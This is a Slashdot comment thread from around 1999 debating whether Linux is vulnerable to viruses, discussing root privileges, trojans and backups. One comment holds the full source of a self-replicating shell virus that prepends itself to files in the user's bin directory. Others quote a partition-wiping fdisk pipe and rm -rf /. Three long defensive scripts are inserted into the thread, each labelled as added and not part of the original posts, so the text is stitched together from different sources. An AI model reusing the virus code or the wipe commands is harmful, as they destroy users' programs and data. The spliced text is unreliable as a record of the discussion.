Linux Virii On Their Way?
Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.
root? (Score:1)
course I'm still a newbie, so they coulda been lying to me.
DUH... (Score:1)
Programs run in user space not kernel space so they can't fsck with your resources.
The virus would have to find a way to get root access.
I can see how something like kernel NFS or the new kernel web server could possibly be exploited to do this, which is why I won't run them.
NJV
Just what we need (Score:1)
Re:root? (Score:1)
Virus or Trojan ? (Score:3)
Viruses/trojans are much less of a problem in *nix simply because most running should be done from unprivileged user accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.
-- Robert
Security Philosophy is Paramount (Score:3)
Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.
The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.
why only from russia ? (Score:1)
linux virii on the loose!!! (Score:1)
Looks like an antivirus company for 15m of fame (Score:2)
Maybe these russians just thought they could shake up the media a bit if they did that... and
get a fair share of the market, in case an "Antivirus for Linux" ever exists...
Bliss? (Score:2)
My question is, why is slashdot reporting news that has been known for over 2 years?
This will be somewhat of a problem in the future (Score:2)
Of course, this all comes down to system configuration. If the system is properly configured, then viruses would be no problem. But who has the time, or the patience? The average user does not. And it is the average user who falls victim to viruses.
Re:DUH... (Score:1)
Please, before you post comments like this think about them first. There's nothing wrong with being cautious, but there is no need for paranoia.
Linux Anti-Virus (Score:1)
Re:Can we say.... (Score:1)
Shades of Joe McCarthy (Score:2)
I suppose he also has a list in his pocket of 205 communists^H^H^H^H^H^H^H^H^H^H viruses in the Linux department
Re:Virus or Trojan ? (Score:1)
Full Disclosure (Score:1)
We've seen it time and time again. Security through obscurity doesn't work. I still can't believe that there are *professionals* out there who still believe hiding how the software works is really the way to go.
Re:Just what we need (Score:1)
--
Linux proto viruses (Score:3)
what was called a 'proto' virus. Though the virus only infected the files of that particular user, it was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected. Because then the sysop has to trace down who else on the system executed files of that user. And trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were available for the whole system.
FUD? (Score:3)
I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle management and not the technical ranks; I think the technical rank and file who are Linux or Unix literate would just dismiss Kaspersky's claims.
Never knock on Death's door:
Careful With That Virus, Eugene (Score:1)
(with apologies to Pink Floyd)
What of boot sector viruses? (Score:2)
Take it as a flamebait (Score:1)
Yes, there are *real* Linux viruses (Score:5)
Well, there you are wrong. There exist real viruses for Linux. They are not trojans and some of them even look for security holes in other computers so that they can break into them. Some links to the most "famous" ones:
Bliss [datafellows.com]
Staog [datafellows.com]
--
Re:Linux Anti-Virus (Score:2)
Didn't you see the C compiler that built a trojaned version of login, and had the sense to compile its trojan version of login into all C compilers it compiled even though the source didn't have it? Was a /. article not too long ago.
Re:DUH (Score:1)
Permissions don't necessarily help (Score:4)
Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.
Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?
No, Linux is not immune to viruses. And as long as buffer overflows and the like continue to be treated as minor oversights and not as the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...
Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?
Regards,
Ben
PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.
Kaspersky is out of his field... (Score:5)
That being said, I also used to hang out on FidoNet's virus echos in 1994 and 1995, where some of the true anti-virus experts hung out too. And yes, I consider Eugene Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word macro virus (Winword.Concept) appeared, he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another Word macro which caught and disinfected Winword.Concept).
Unfortunately, I fear this is another case of False Authority Syndrome [kumite.com] in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)
I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.
Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distribution is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.
What's wrong with root? (Score:2)
Most of the time I use Linux I am tinkering, recompiling, reinstalling new versions etc... things that require root access. So why bother with the fiction of a 'user' account?
Ok, so I might be exposing myself to a slightly greater risk with regards to Linux viruses - guess that's what backups are for.
-josh
Re:Virus or Trojan ? (Score:2)
That's all fine and dandy for source packages that are just a couple hundred K, but for instance, when I download a new kernel, I simply assume that Linus trusted everyone whose contributions he included. There's no way I want to visually scan 17 Megs of source to make sure there's nothing fishy.
That, plus the fact that a LOT of apps I use are shrink-wrapped. Not many apps for Linux are without source, but it sounds like it's going to change.
Then what?
The real problem (Score:2)
--The knowledge that you are an idiot, is what distinguishes you from one.
its weakness is also its strength (Score:2)
The "security expert" has a point, but does not seem to be seeing the whole picture. Open source might make it easier for malicious virus-writers to exploit Linux... but it also makes it easier for the rest of us to see what devious tricks they're up to and protect ourselves. I'm going to be generous and suggest that there are more of us than there are of them. There are probably better minds working on the "good-guy" team too.
I don't see how this would make Linux viruses "worse", though theoretically they could be more prevalent. In that unusual scenario, it might be advisable for the uninformed newbies to stick with closed-source OS'es (like they don't already?), since they don't yet know how to protect themselves.
Windows et al. might then rightfully be seen as "training wheels" OS'es, for people to use until they learn what they're doing and are ready to graduate to open source.
As most viruses in the real world are NOT written to exploit open-source OS'es, even that argument doesn't apply in reality. If it's not a good entry-level OS (for security reasons), what IS Windows good for?
Re:Security Philosophy is Paramount (Score:2)
Have you heard that people are considering Linux to be almost ready to replace Windows on the desktop? Well, one user on a single user system can easily hose all of his files, so that theory doesn't really hold.
Good opportunity to educate, this (Score:3)
But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.
Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.
this is easier than you think (Score:2)
trust is a magical thing to abuse. and users' trust is getting greater and greater. how many times has the schlub in the cubicle next to you downloaded some spiffy screensaver from the net or run some "executable" from their email? all too often... :)
bear in mind that Thompson built a cc trojaned to allow him to log in specially on any box using his cc, which also built its trojan-propagating systems in, too. :) Thompson's not malicious, but some people are.
think about all the s|
Portable Unix Virus (Score:3)
Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.
#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676
seed=1
function srandom () { seed=$[$$+`date +%s`] }
function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }
function choose () {
shift `random $#`
echo $1
}
function infected () {
head -2 $1 | tail -1 | grep $signature > /dev/null
}
function infect () {
# pathlist=`echo $PATH | tr : " "`
# dir=`choose $pathlist`
dir=$HOME/bin
echo "Will infect in $dir"
names=`find $dir -maxdepth 1 -type f`
name=`choose $names`
echo "will infect $name"
if infected $name; then
echo Already infected
else
if [ ! -w $name ]; then
notwrite=1
chmod u+w $name
fi
if [ -w $name ]; then
infectfile=`mktemp` || {
echo 'cannot create a temporary file' >&2
exit 1
}
(head -$[$skip-1] $0; cat $name) > $infectfile
cat $infectfile > $name
rm -f $infectfile
if [ x$notwrite = x1 ]; then
chmod u-w $name
fi
echo success
else
echo Darn, no write permissions
fi
fi
}
srandom
tmpfile=`mktemp` || {
echo 'cannot create a temporary file' >&2
exit 1
}
if tail +$skip $0 > $tmpfile; then
infect
chmod 700 $tmpfile
prog="`echo $0 | sed 's|^.*/||'`"
if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
(sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
else
trap 'rm -f $tmpfile; exit $res' 0
(sleep 5; rm -f $tmpfile) 2>/dev/null &
$tmpfile ${1+"$@"}; res=$?
fi
else
echo Cannot decompress $0; exit 1
fi; exit $res
true
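A quick audit of the vector the script above relies on, added here as an example and not part of jepler's post or anyone else's in this thread: the script only ever overwrites files the running user can write (it tries `chmod u+w` first and gives up otherwise), which is exactly why a non-root user can hit `$HOME/bin` but not `/bin/ls`, as the Kaspersky comment above says. The function below walks a PATH-style list and reports every directory and regular file the current user could modify. The name `audit_path` and the stand-alone file name in the last line are my own choices.

```shell
#!/bin/sh
# Added example (not from the original thread): report every directory on a
# PATH-style list, and every regular file inside those directories, that the
# current user could modify. The virus script above only ever touches files
# it can write to, so this listing is its whole attack surface.
#
# Usage: audit_path [PATHLIST]     defaults to $PATH
# Exit status is 0 when nothing writable was found, 1 otherwise.

audit_path() {
    pathlist=${1:-$PATH}
    found=0
    old_ifs=$IFS
    IFS=:
    set -- $pathlist          # split on ':' only; "$@" is now the directory list
    IFS=$old_ifs
    for dir in "$@"; do
        [ -n "$dir" ] || dir=.    # an empty PATH entry means the current directory
        [ -d "$dir" ] || continue
        if [ -w "$dir" ]; then
            # Worse than a writable file: an attacker can drop a brand-new
            # binary that shadows a real one further down the path.
            printf 'WRITABLE DIR  %s\n' "$dir"
            found=$((found + 1))
        fi
        for f in "$dir"/* "$dir"/.[!.]*; do
            [ -f "$f" ] || continue      # skips the unexpanded glob and non-files
            if [ -w "$f" ]; then
                printf 'WRITABLE FILE %s\n' "$f"
                found=$((found + 1))
            fi
        done
    done
    [ "$found" -eq 0 ]
}

# Stand-alone use (sh audit_path.sh): audit the caller's own PATH.
case ${0##*/} in audit_path.sh) audit_path ;; esac
```

Run it from the account that actually executes downloaded code, not as root: root can write everything, so the output is meaningless there, which is the same reason the thread keeps saying not to run things as root. A writable directory on PATH is the finding to fix first; the attacker does not need to patch an existing binary at all, just drop a new `ls` earlier in the search order.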
Linux is a virus in itself (Score:5)
It spreads from user to user, and once you're infected, you can never go back.
It has been known to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
Klooless Noobies (Score:3)
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's not so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack background with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.
So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh?
Re:Just what we need (Score:2)
How convenient! This reminds me of the story about Novell's CEO a few months back. He claimed that his CC number was stolen on the internet, and what do you know, the best way to keep this from happening just happens to involve Novell software.
Ian "zsazsa" Scott
Virus != Trojan (Score:2)
A virus might attach itself to a benign program, thus transforming that program into an unwitting trojan, or a trojan might deliver a non-self-replicating program - even a virus killer.
Of course either of the two can exist on Linux, but Linux (and all Unices) have security mechanisms to minimise the damage done by, and propagation of, these beasties.
It would be interesting (Score:2)
Re:What of boot sector viruses? (Score:2)
Re:The real problem (Score:2)
*nix and Viruses (Score:5)
--
Good. Bring them on. (Score:2)
Answer:
After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of the sudden will be. And people will start thinking before make && make install
It can't kill us, and what doesn't kill us only makes us stronger.
Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.
No OS is really immune (Score:3)
Even though they may not be able to damage anything other than the user's files, the infected program will probably be able to read the user's address database and send itself to, say, the first 50 names in the address book (ring any bells? :-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the user's home dir then that opens another way for it to spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze as well so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.
Virii is not a word (Score:2)
Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices.
What, you don't think that's a real word either? Damn language nazis...
Re:Security Philosophy is Paramount (Score:2)
Of course, if you always boot a system to single-user mode, or if you always log in as root, yes, you can do some serious damage. But anyone who has spent time in QA will tell you that "idiotproof" really means "not yet subjected to critical levels of stupidity."
Re:Kaspersky is out of his field... (Score:4)
I think what he's most concerned about is the fact that a malicious hacker can construct a more potent virus since he has access to the OS's source. Linux is most definitely more popular than it was a couple years ago, which makes it more interesting to virus writers, or certain other OS companies who may benefit in discrediting Linux.
What Kaspersky overlooks is that Linux is a constantly evolving OS. As long as that remains the case, Linux could evolve an immune system to counteract viruses, either by seeking them out or by fixing weaknesses that virus writers find.
-Jennifer
You're right, but you're wrong. (Score:2)
Automated library-level checking, whether using a stackguarded compiler or weird stack hacks in the OS is no way to make an app buffer-overflow secure. The only way to do it is continuous human code auditing (and careful initial coding practices), à la OpenBSD. OpenBSD is tight, carefully audited, and in fact provides surprisingly little as far as applications. The size of a typical Linux install is a huge enemy of auditing -- there's just too much stuff to go through. You can however build quite a secure system (assuming you don't have any untrusted local users) simply by strictly limiting which services your machine offers to the outside.
The Internet Worm won't happen again in the UNIX world -- we learned our lesson at the time about poorly written programs and known problems. M$, typically, still hasn't figured this one out. The only reason UNIX users won't be vulnerable to Word Macro-type viruses is that no UNIX user would use such a pathetically stupid application -- and a UNIX user would know better than to execute a random chunk of code he found lying around.
Of course the user can still screw himself if he's dumb, but that's not fundamentally against the UNIX mentality -- 'rm -Rf *' has always been there waiting for you.
...
Actually, a real problem is the fact that most users go looking all over the internet for RPMs of their latest gotta-have applications, without checking the origins. Downloading RPMs from random webpages and installing them as root could be a very bad idea.
Re:*nix and Viruses (Score:2)
Tosh. Linux is no less a unix than any other flavour that's gone its own sweet (and in some cases, commercial) way.
It is also no less "unix" because you often get only one person using it; in case you'd not heard, there are one or two machines in existence that run multi-user stuff as well as poxy desktops. Cobalt Cube, and all that. In some cases, RDBMS servers. And so on.
Of course, if you have a linux box as your only OS in your room, and clone yourself across the entire USA, then I'd see why there might be a problem - you've got the same OS throughout, and any
However, if you keep yourself uptodate with security patches, as you should, then you'll keep the enemy at bay for far longer.
The separation between "user space" and OS-space in terms of ACLs is essential here; am I the only one that doesn't want clueless lusers sullying the good name of Linux by their demands for bad practice?
Sure, Linux viruses might be worse... (Score:2)
The thing is, all other things are not equal.
The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user.
Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error.
What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about than MS-Windows users.
The "It's hard to gain root access" fallacy (Score:4)
It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?
Although it is true that Linux (and Unices in general) tend to give less motivation to virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork() bombs? Or HD space hoggers that cause you to be unable to save your latest document? The system may be less vulnerable, but your data isn't.
Re:Huh? (Score:3)
You are probably thinking of second declension masculine Latin nouns (there are lots of them). The nominative singular ending for these nouns is -us. The nominative plural is -i (note just one i, not two (or i, not ii, in Roman numerals)).
There are other declensions that use -us in the nominative singular and something different in the plural. For example, third declension nouns of any gender may end in -us in the nominative singular, while the nominative plural ending for masculine nouns is -es.
I realize that I may be one of the only Slashdot geeks to have majored in Classical Languages instead of Computer Science, and no pedantry was intended in this post.
Re:Security Philosophy is Paramount (Score:2)
What i said was:
If a user has privileges to open and modify their own files, then a virus running in their user mode would have the ability to open, change and delete them as well.
Yeah, the system will stay up, but as it is, it does nothing for protecting the users' own files. Something needs to happen to prevent an errant program from destroying all the files it's allowed to touch. But how would a utility discern between a bash script being run by the user and a script being launched by an application?
Re:What's wrong with root? (Score:2)
Re:Linux is a virus in itself (Score:2)
300M is bloat. I can match the default functionality of NT 4.0 and still fit it on a 40M Seagate.
Re:Linux is a virus in itself (Score:2)
Things that make Linux harder/easier to attack (Score:4)
Some things that are going to make Linux easier to attack:
One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.
The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.
Heh heh heh (Score:3)
Microsoft will blame it on the poor security model in Linux.
Re:*nix and Viruses (Score:4)
The technical hurdle, as low as it might be, is important. By the time you are sufficiently knowledgeable to be dangerous, you're usually intelligent enough to know _why_ this behavior is frowned upon. And have channeled your behaviors into more socially acceptable (and might I add, more rewarding) behaviors. Most decent sysadmins could be hackers and virus writers of legendary proportions. Generally, they aren't.
The open source nature of Linux even helps here- as now there are other ways for a bright teenager to gain fame and technical esteem than writing virii. Instead, they can write kernel patches, or work on Gnome or Abiword, or write their own programs- in other words they can do something _productive_ rather than _destructive_ programs. I'm kind of interested to see what a couple million Chinese programmers can create. I doubt it'll be virii
Re:Portable Unix Virus (Score:2)
Viruses on Linux and the One known Linux virus (Score:3)
Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.
A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.
Viruses would also have to fear programs like Tripwire which take checksums of vital executables. This is another good reason to use Tripwire and related products. While it is possible to defeat Tripwire it would involve more code than a virus is likely to want to carry in its payload.
Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.
Unless you code your virus in a macro language, the cross-platform nature of Linux will also bog down the prospective virus writer. Since the architectures are very different and viruses usually do very low level stuff, he'd have to port the machine dependent code to the various Linux platforms. On the plus side he could use CVS and Bugzilla so that his users could report bugs with his virus.
Sure... (Score:2)
Re:Virus or Trojan ? (Score:3)
Quotas... or... (Score:2)
Re:The "It's hard to gain root access" fallacy (Score:2)
There is a kernel module that replaces the exec() call (I think) and provides the exact protection you are asking about. You can tune the amount of forking by user and it also (IIRC) supports logging of "over-fork" conditions.
Where is it? Here [freshmeat.net] is a link to Freshmeat [freshmeat.net].
Re:Yes, there are *real* Linux viruses (Score:2)
The linux kernel takes over everything, so basically there shouldn't be any possibility for extraneous code to survive the boot process.
Of course, you could "infect" in some way a kernel image, but one has to be already root in order to do that, so basically it's pointless.
The problems arise when the user acts as a dumb monkey *as root*. There's little that you could do when some of your fundamental binaries are replaced by trojans (think of
So:
1) Don't take it too easy when you download something precompiled. Those md5sums are there for a reason, so use them!
2) Don't run as root when you don't need to. Use utilities like "sudo" only on trusted binaries.
3) Don't install something as root if you don't need to (in fact, there's little that actually NEEDS to be installed as root, and practically nothing that actually NEEDS to stay necessarily in
The first beta of WordPerfect 8 for Linux was known for producing a possible security hole when installed as root, and the usual advice (until it was corrected) was to create a particular user just for WordPerfect binaries. Not a virus, not a trojan, but just a mistake. You can always do something like this for binaries that you don't trust 100%.
The remaining advice is the usual: make backups of data, make backups of data and still make backups of data. And possibly make a backup of your configuration files (not binaries, because reinstalling a Linux distribution from scratch generally doesn't take more than 1 hour, which shouldn't be a problem in a home environment). A CD recorder is something cheap enough that could do well today for home backups, if you can't afford a more expensive tape streamer.
Keep in mind these basic principles, and trojans will stay away from you for a loooooong time.
My 0.00001 Euro
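One concrete way to act on "those md5sums are there for a reason" above and on the Tripwire remarks earlier in the thread, added here as an example and not code from any poster: take a hash baseline of a tree of binaries, store it where the audited account cannot write, and later re-check both the hashes and the list of paths. The function names `make_baseline` and `check_baseline` are mine, and `sha256sum` stands in for the `md5sum` of the era because MD5 collisions are cheap to produce now.

```shell
#!/bin/sh
# Added example (not from any poster): a Tripwire-style integrity baseline.
#   make_baseline DIR BASELINE     hash every regular file under DIR into BASELINE
#   check_baseline BASELINE DIR    re-hash, report CHANGED/missing and NEW files;
#                                  returns 0 only when the tree is untouched
# Keep BASELINE where the audited account cannot write (read-only media, a
# remote host); a baseline the intruder can regenerate proves nothing.

make_baseline() {
    dir=$1; baseline=$2
    # Fixed sort order so two baselines of an identical tree are byte-identical.
    find "$dir" -type f | LC_ALL=C sort | while IFS= read -r f; do
        sha256sum "$f"
    done > "$baseline"
}

check_baseline() {
    baseline=$1; dir=$2; status=0
    # sha256sum -c prints "path: OK" or "path: FAILED[ open or read]"; keep the bad ones.
    changed=$(sha256sum -c "$baseline" 2>/dev/null | grep -v ': OK$' || :)
    if [ -n "$changed" ]; then
        printf '%s\n' "$changed" | sed 's/^/CHANGED /'
        status=1
    fi
    # A hash list cannot flag files that did not exist when it was made,
    # so compare the path sets as well (baseline lines are "<64 hex>  <path>").
    then_list=$(mktemp); now_list=$(mktemp)
    cut -c67- "$baseline" | LC_ALL=C sort > "$then_list"
    find "$dir" -type f | LC_ALL=C sort > "$now_list"
    new=$(comm -13 "$then_list" "$now_list")
    rm -f "$then_list" "$now_list"
    if [ -n "$new" ]; then
        printf '%s\n' "$new" | sed 's/^/NEW /'
        status=1
    fi
    return "$status"
}
```

Tripwire keeps the same kind of list with more metadata (mode, owner, inode, mtime) and signs it, but the part that matters survives in this sketch: a baseline sitting on the same disk, writable by the same user that runs the untrusted code, is worth nothing once that user is compromised, which is why the earlier comment talks about a virus having to carry extra code to defeat Tripwire rather than simply rewriting its database. The same applies to vendor md5sums fetched over the same channel as the package; an md5sum you get from the mirror that served you the trojaned RPM tells you only that the mirror is consistent with itself.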
How to be 99.999% secure (Score:3)
With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.
Suggestions:
Re:Linux proto viruses (Score:2)
Funny, I thought that was what BSD process accounting was for. Track all the executions and return codes of all programs. Then there's also the kernel module that tracks every exec().
I mean come on, if you're going to admin, don't be half-assed about it. Get your tcp loggers and your exec() loggers and set your user limits and WATCH the damn system. Don't set it up, leave it go and complain when you got rooted by a 6-week old exploit since you were surfing for pr0n instead of watching the security lists.
The Parable of the Root-Running Dipshit (Score:3)
And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.
And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.
And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.
Re:Nah, not the kernel.... (Score:2)
I don't know about your servers, but my
Public Challenge (Score:2)
Not much different than rm -rf . /* (Score:2)
The upshot is that users in the know back up their critical data on a regular basis. If you can't be bothered to do that, don't expect any sympathy from anyone.
Re:But this is where your plan fails (Score:2)
echo -e 'd\n1\nd\n2\nd\n3\nd\n4\n' | fdisk
I think it's a good habit to be the only one who knows the root password.
One word: Tripwire (Score:2)
Resource limits (Score:2)
Disk quotas can prevent users from filling up filesystems, also.
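The fork() bombs and "HD space hoggers" from the root-access-fallacy comment are exactly what the resource-limit and quota replies are answering. As an added example (mine, not any poster's), this is what setting those limits around a single untrusted program looks like from a shell; the function name `run_limited` and the stand-alone demo file name are my own.

```shell
#!/bin/sh
# Added example (not from any poster): run a possibly hostile program under
# per-process resource limits set in a subshell, so the caller's shell keeps
# its own limits.
#   run_limited MAX_FILE_BLOCKS MAX_PROCS COMMAND [ARGS...]
# ulimit -f caps the size of any file the child may create (the "HD space
# hogger" from the thread); ulimit -u caps how many processes the invoking
# user may have, which turns a fork() bomb into a string of failed fork()s.
# A soft limit can always be lowered by an unprivileged user and never raised
# again without root, so the subshell is a one-way door for the child.

run_limited() {
    max_file=$1; max_procs=$2; shift 2
    (
        # bash counts -f in 1024-byte blocks, dash in 512-byte blocks, so treat
        # the number as an upper bound rather than an exact size.
        ulimit -f "$max_file" || exit 127
        # Pass "unlimited" to leave the process cap alone: on an account that
        # already runs many processes a low cap makes the next fork() fail too.
        # bash/ksh spell this limit -u; dash spells it -p.
        [ "$max_procs" = unlimited ] || ulimit -u "$max_procs" || exit 127
        exec "$@"
    )
}

# Stand-alone demo (sh run_limited.sh): the first write is cut off at the
# limit and the child dies with SIGXFSZ, the second fits comfortably.
case ${0##*/} in
run_limited.sh)
    run_limited 10  unlimited sh -c 'head -c 20000 /dev/zero > /tmp/hog; ls -l /tmp/hog'
    run_limited 100 unlimited sh -c 'head -c 20000 /dev/zero > /tmp/ok;  ls -l /tmp/ok'
    ;;
esac
```

Two caveats a practitioner would want. The process cap only bites unprivileged accounts: Linux does not enforce RLIMIT_NPROC on a process holding CAP_SYS_RESOURCE or CAP_SYS_ADMIN, so a fork bomb run as root is limited by nothing but the kernel's global table, one more reason for the "don't run it as root" refrain in this thread. And `ulimit -f` limits one file, not a user; stopping someone from filling the filesystem with many small files is the job of disk quotas (`edquota`/`setquota`), and making either limit stick across logins is done per user in `/etc/security/limits.conf` via pam_limits rather than in a wrapper like this.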
Re:As long as we're fighting about it... (Score:2)
i was more or less under the impression that "virile" (from latin "vir" meaning "man," i believe--akin to "puerile" from "puer" = "boy") referred to the sexual capability of a male, and that the correct word to describe a particularly nasty virus was "virulent." anyone want to correct me?
No argument here, a natural virus would be virulent. But it's kinda funny to think about a "virile" computer virus. I think it would be one that automatically redirected your web browser to porn sites and guns.com :-)
Or maybe popped up messages like "is my CD drive open or am I just happy to see you?" and "Are you implying I could ever have a soft drive?"
Re:*nix and Viruses (Score:2)
For this class of user, the potential for a Linux virus infection is much greater, since lots of Linux newbies (like their Windows counterparts) will quite happily run things as root without knowing what they do or where it came from.
A few reflexions (Score:2)
Re:That's why you back up your home directory! (Score:2)
Re:The "It's hard to gain root access" truth (Score:2)
Not quite true. If a virus deletes my entire home directory, and I'm smart, I just whip out the latest backup CD-R and do the restore as root. Voila, no more virus.
On the other hand, if a virus infects my system running as root or infects my Windows system, there is nothing short of a reinstall I could do to make sure my system is secure. That virus might have infected anything on the system, from
And frankly, I have to reinstall Windows often enough when it's virus-free. I haven't reinstalled Linux in years, and I'd like to keep it that way.
Virii that exploit bugs? Been there, done that. (Score:2)
Well, look at the Linux/Stoag [datafellows.com] computer virus. It does exactly what we're worrying about in exploit bugs.
Linux as an operating system is, in actuality, a lot more insecure than we'd like to admit. To prove my point, look at RedHat's Linux 6.1 Security Advisories [redhat.com] page. How many of these packages were fixed to prevent root exploits? Five of thirteen. But look at how common some of these five are!
Malicious people can use lpr of all things! Another famous example: bind. Or how about wu_ftpd? Those two alone are present on how much of the Linux community?
Honestly, were it not for freshmeat.net [freshmeat.net], I probably would not have discovered the existence of the new packages. (I don't check RedHat's site often. And I don't sign up for mailing lists either... So this is my fault.)
There are script kiddies out there who can manipulate the overflows in bind. (Please, for the love of God, if you haven't updated to bind 8.2.2_P3, go do so!) If a script kiddie can find a way to do that, then some coder worth his paycheck can probably figure out a way to have a program manipulate itself into root that way.
I mean, all some perverse (or highly bored) programmer has to do is write a program to manipulate those bugs to get root... And then run rm -rf / to kill your machine. (There are, of course, nastier things one could do, but the fewer ideas I generate for others, the better.)
By no means are we safe. Linux virii will eventually be created and released into the wild. (There are even some that claim that MicroSoft will be the origin for the epidemic.)
The only way we can keep ourselves truly safe is to catch security holes before the other side does and update our source packages before the attacks start.
There is a saying in network security: "One loose link is all you need."
